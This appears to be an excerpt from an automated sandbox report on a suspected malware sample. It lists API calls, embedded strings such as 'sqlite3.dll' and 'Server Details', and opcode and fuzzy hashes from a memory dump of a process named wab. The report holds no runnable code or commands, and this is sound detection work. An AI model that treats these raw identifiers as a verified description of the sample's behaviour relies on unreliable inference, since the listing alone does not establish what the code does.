                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _ultoasprintf
                                                                                              • String ID: %s %s %s
                                                                                              • API String ID: 432394123-3850900253
                                                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                              • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00409919
                                                                                              • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendmemset
                                                                                              • String ID: N\@
                                                                                              • API String ID: 568519121-3851889168
                                                                                              • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                              • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                              • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                              • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                              • sprintf.MSVCRT ref: 0040909B
                                                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                              • String ID: menu_%d
                                                                                              • API String ID: 1129539653-2417748251
                                                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _msizerealloc
                                                                                              • String ID: failed memory resize %u to %u bytes
                                                                                              • API String ID: 2713192863-2134078882
                                                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                              • strrchr.MSVCRT ref: 00409808
                                                                                              • _mbscat.MSVCRT ref: 0040981D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName_mbscatstrrchr
                                                                                              • String ID: _lng.ini
                                                                                              • API String ID: 3334749609-1948609170
                                                                                              • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                              • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                              • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                              • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _mbscpy.MSVCRT ref: 004070EB
                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                              • _mbscat.MSVCRT ref: 004070FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscat$_mbscpystrlen
                                                                                              • String ID: sqlite3.dll
                                                                                              • API String ID: 1983510840-1155512374
                                                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                              • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString
                                                                                              • String ID: A4@$Server Details
                                                                                              • API String ID: 1096422788-4071850762
                                                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID:
                                                                                              • API String ID: 438689982-0
                                                                                              • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                              • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                              • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                              • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3110682361-0
                                                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                              • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3510742995-0
                                                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%